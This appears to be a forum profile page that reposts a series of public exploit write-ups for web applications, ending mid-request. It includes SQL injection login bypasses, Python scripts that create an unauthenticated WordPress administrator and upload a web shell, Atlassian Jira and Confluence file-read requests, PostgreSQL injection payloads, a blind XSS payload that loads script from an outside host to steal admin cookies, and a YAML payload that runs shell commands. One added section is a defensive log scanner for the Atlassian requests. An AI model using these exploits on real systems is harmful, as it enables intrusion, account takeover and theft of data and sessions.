
Everything posted by HireHackking
-
Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-02
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Steps-To-Reproduce:

Step 1 – Go to the admin panel http://localhost/bsenordering/admin/login.php
Step 2 – Enter the default admin username janobe and enter password test
Step 3 – Click on Sign in and capture the request in the Burp Suite
Step 4 – Change the user_email to janobe' or '1'='1
Step 5 – Click forward and now you will be logged in as an admin.

POC

POST /bsenordering/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/login.php
Cookie: PHPSESSID=him428198e798r23eagi9mapjk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

user_email=janobe' or '1'='1&user_pass=test&btnLogin=
-
Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/thecartpress/
# Date: 04/10/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugin/thecartpress
# Version: <= 1.5.3.6
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests
import sys

def print_banner():
    print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
    print("Author -> space_hen (www.github.com/spacehen)")

def print_usage():
    print("Usage: python3 exploit.py [target url]")
    print("Ex: python3 exploit.py https://example.com")

def vuln_check(uri):
    # The AJAX handler answers with a validation message when it is reachable
    response = requests.get(uri)
    raw = response.text
    if ("User name is required" in raw):
        return True
    else:
        return False

def main():
    print_banner()
    if(len(sys.argv) != 2):
        print_usage()
        sys.exit(1)

    base = sys.argv[1]
    ajax_action = 'tcp_register_and_login_ajax'
    admin = '/wp-admin/admin-ajax.php'
    uri = base + admin + '?action=' + ajax_action

    check = vuln_check(uri)
    if(check == False):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    data = {
        "tcp_new_user_name" : "admin_02",
        "tcp_new_user_pass" : "admin1234",
        "tcp_repeat_user_pass" : "admin1234",
        "tcp_new_user_email" : "test@test.com",
        "tcp_role" : "administrator"
    }

    print("Inserting admin...")
    response = requests.post(uri, data=data)
    if (response.text == "\"\""):
        print("Success!")
        print("Now login at /wp-admin/")
    else:
        print(response.text)

main()
-
Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26086

POC File #1 - web.xml

GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #2 - seraph-config.xml

GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #3 - decorators.xml

GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #4 - /jira-webapp-dist/pom.properties

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #5 - /jira-webapp-dist/pom.xml

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #6 - /atlassian-jira-webapp/pom.xml

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #7 - /atlassian-jira-webapp/pom.properties

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
-
Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read
# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: version < 7.4.10 and 7.5.0 ≤ version < 7.12.3
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26085

POC #1 - web.xml

GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #2 - seraph-config.xml

GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #3 - pom.properties

GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #4 - pom.xml

GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
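Added defender-side example (not part of either Atlassian advisory above, and not Atlassian's or the authors' code): the Jira (CVE-2021-26086) and Confluence (CVE-2021-26085) PoC requests share one shape, a `/s/<anything>/_/` static-resource prefix followed by a `;` path-parameter separator and then a WEB-INF or META-INF path. The Python below parses combined-format access-log lines and flags requests of that shape, recording whether the server actually served the file (HTTP 200) so an incident responder can tell a successful read from a blocked probe. The log lines, IP addresses and timestamps are constructed; the log format and both regular expressions are this example's own assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (combined-log style); the request paths
# follow the shape of the PoC requests above, everything else is made up.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2021:10:01:02 +0000] "GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 4812
10.0.0.5 - - [05/Oct/2021:10:01:03 +0000] "GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1" 200 2210
10.0.0.7 - - [05/Oct/2021:10:02:10 +0000] "GET /s/d41d8cd98f/_/download/resources/jira.css HTTP/1.1" 200 91002
10.0.0.9 - - [05/Oct/2021:10:03:44 +0000] "GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 200 138
10.0.0.9 - - [05/Oct/2021:10:03:50 +0000] "GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1" 403 0
10.0.0.9 - - [05/Oct/2021:10:04:00 +0000] "GET /browse/PROJ-1 HTTP/1.1" 302 0
"""

# Minimal combined-log parser: client IP, timestamp, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# The PoC paths all share this shape: /s/<anything>/_/ then a ';' path
# parameter, then a container-internal directory that should never be served.
TRAVERSAL_RE = re.compile(
    r'^/s/[^/]*/_/;.*?/(?:WEB-INF|META-INF)(?:/|$)', re.IGNORECASE
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the parsed fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_traversal_path(path: str) -> bool:
    """True when the request path has the semicolon path-parameter traversal shape."""
    return TRAVERSAL_RE.search(path) is not None


def scan_log(text: str) -> List[Dict[str, str]]:
    """One finding per suspicious line; 'served' says whether the read succeeded (HTTP 200)."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_traversal_path(rec["path"]):
            continue
        findings.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "path": rec["path"],
            "status": rec["status"],
            "served": "yes" if rec["status"] == "200" else "no",
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['status']} served={f['served']} {f['path']}")
```

A 200 on one of these paths means the container handed out WEB-INF or META-INF content and the host should be treated as exposed until patched to a fixed version listed in the advisory headers; 403 or 404 results are probes worth correlating by source address but not confirmed reads.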
-
Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload
# Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/mstore-api/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/mstore-api/
# Version: 2.0.6, possibly higher
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests
import sys

def print_banner():
    print("MStore API < 2.0.6 - Arbitrary File Upload")
    print("Author -> space_hen (www.github.com/spacehen)")

def print_usage():
    print("Usage: python3 exploit.py [target url] [shell path]")
    print("Ex: python3 exploit.py https://example.com ./shell.php")

def vuln_check(uri):
    # The REST route answers with a key-validation message when it is reachable
    response = requests.post(uri)
    raw = response.text
    if ("Key must be" in raw):
        return True
    else:
        return False

def main():
    print_banner()
    if(len(sys.argv) != 3):
        print_usage()
        sys.exit(1)

    base = sys.argv[1]
    file_path = sys.argv[2]
    rest_url = '/wp-json/api/flutter_woo/config_file'
    uri = base + rest_url

    check = vuln_check(uri)
    if(check == False):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    if( path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)

    files = {'file' : ( "config.json.php", open(file_path), "application/json" )}

    print("Uploading shell...")
    response = requests.post(uri, files=files)
    # response should be location of file
    print(response.text)

main()
-
Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Date: 05.10.2021
# Exploit Author: Emel Basayar
# Vendor: Odine Solutions - odinesolutions.com
# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18 TLS
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.
# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.

====================================================
# PoC : SQLi :

GET /rass/api/v1/trafficCycle/98 HTTP/1.1
Host: 192.168.1.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
Origin: https://192.168.1.25
Connection: close
Referer: https://192.168.1.25

Parameter: #1* (URI)
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
---
web application technology: Nginx
back-end DBMS: PostgreSQL
====================================================
-
Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
# Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
# Date 04.10.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://forum.ait-pro.com/read-me-first/
# Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip
# Version: <= 5.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-39327
# CWE: CWE-200
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md

'''
Description:
The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure
in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the
path of database backup files. This affects versions up to, and including, 5.1.
'''

'''
'Banner:
'''
banner = '''
 ______ _______ ____ ___ ____ _ _____ ___ _________ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ // _ \___ /___ \___ |
| | | \ \ / /| _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / /
\____| \_/ |_____| |_____|\___/_____|_| |____/ /_/____/_____/_/

    * Sensitive information disclosure
    @ Author: Ron Jost
'''
print(banner)

import argparse
import requests

'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH

print('')
print('[*] Starting Exploit:')
print('')

# The two locations where the plugin writes its publicly readable backup log
paths = ["/wp-content/bps-backup/logs/db_backup_log.txt",
         "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"]

# Exploit
for pathadd in paths:
    x = requests.get("http://" + target_ip + ':' + target_port + '/' + wp_path + pathadd)
    print(x.text)
-
Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
# Date: 2021-10-06
# Exploit Author: Yash Mahajan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/
# Version: V 1.0
# Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1
# Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724
# Tested on Windows 10, XAMPP

*Steps to Reproduce:*

1) Navigate http://localhost/odms/book-services.php?bookid=1
2) Enter Blind Xss payload `"><script+src=https://yourxsshunterusername.xss.ht>` in "name=","vaddress=" and "addinfo=" parameters and click on "Book".

Request:
========

POST /odms/book-services.php?bookid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Origin: http://localhost
Connection: close
Referer: http://localhost/odms/book-services.php?bookid=1
Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

name="><script+src=https://biest.xss.ht></script>&email=aa@gg.com&mobnum=9999999999&edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress="><script+src=https://biest.xss.ht></script>&eventtype=Pre+Engagement&addinfo="><script+src=https://biest.xss.ht></script>&submit=Book

Now to confirm the vulnerability

3) Login as admin by navigating to http://localhost/odms/admin/login.php.
4) Now as soon as admin visits /view-booking-detail.php to approve the booking, payload fires and attacker will get the details like ip address, cookies of admin
5) Able to steal admin's cookies successfully!!

#POC
https://ibb.co/Vj3jn2d
https://ibb.co/bm9MGdG
-
Google SLO-Generator 2.0.0 - Code Execution
# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
# Date: 2021-09-28
# Exploit Author: Kiran Ghimire
# Software Link: https://github.com/google/slo-generator/releases
# Version: <= 2.0.0
# Tested on: Linux
# CVE: CVE-2021-22557

##############################################################################
*Introduction*:
slo-generator is a tool to compute and export Service Level Objectives (SLOs), Error Budgets and Burn Rates, using configurations written in YAML (or JSON) format.
##############################################################################

*POC:*

1. pip3 install slo-generator==2.0.0

2. Save the below yaml code in a file as exploit.yaml.

!!python/object/apply:os.system ["id;whoami"]

3. Run the below command

slo-generator migrate -b exploit.yaml
##############################################################################
-
Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### SQL Injection
# All requests can be sent by both an authenticated and a non-authenticated user
# Example vulnerable pages and parameters:

* http://localhost/traffic_offense/classes/Users.php
  Parameters:
  - id
  - firstname
  - lastname
  - username

* http://localhost/traffic_offense/classes/Login.php
  Parameters:
  - username
  - password

* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
  Parameters:
  - id

* http://localhost/traffic_offense/classes/Master.php
  Parameters:
  - id
  - date_created
  - ticket_no
  - status
  - offense_id
  - fine
  - code
  - name

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1
# Login request generate sql injection error

POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=xxxx'&password=xxxx2'

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:31:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 265
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\classes\Login.php</b> on line <b>22</b><br />
{"status":"incorrect","last_qry":"SELECT * from users where username = 'xxxx'' and password = md5('xxxx2'') "}

-----------------------------------------------------------------------------------------------------------------------
# Exploitable request - login parameter can be any value

POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=admin&password=xxxx')+or+'1'='1'+and+('1

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:24:50 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------
Logged as admin account
-----------------------------------------------------------------------------------------------------------------------

## Example 2
# Sql injection detection on the example of pages with the id parameter
# Login request generate sql error - add ' next to the id parameter

GET /traffic_offense/admin/offenses/view_details.php?id=3' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

#Response from database - sql error

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:56:37 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7837
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''3''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '3''
<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>10</b><br />
<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>16</b>
[...]

# Request - add '' next to the id parameter

GET /traffic_offense/admin/offenses/view_details.php?id=3'' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

# Response did not return an error - sql injection confirmed

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:58:40 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7214
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="container-fluid">
  <div class="w-100 d-flex justify-content-end mb-2">
    <button class="btn btn-flat btn-sm btn-default bg-lightblue" type="button" id="print"><i class="fa fa-print"></i> Print</button>
    <button class="btn btn-flat btn-sm btn-default bg-black" data-dismiss="modal"><i class="fa fa-times"></i> Close</button>
  </div>
[...]

-----------------------------------------------------------------------------------------------------------------------
## Example 3
# Using sqlmap on an intercepted request http://localhost/traffic_offense/classes/Master.php

POST /traffic_offense/classes/Master.php?f=save_offense_record HTTP/1.1
Origin: http://localhost
Content-Length: 1598
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: localhost:80
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record&id=1
Content-Type: multipart/form-data; boundary=---------------------------7900788429998101281579901385
Sec-Fetch-Dest: empty

-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

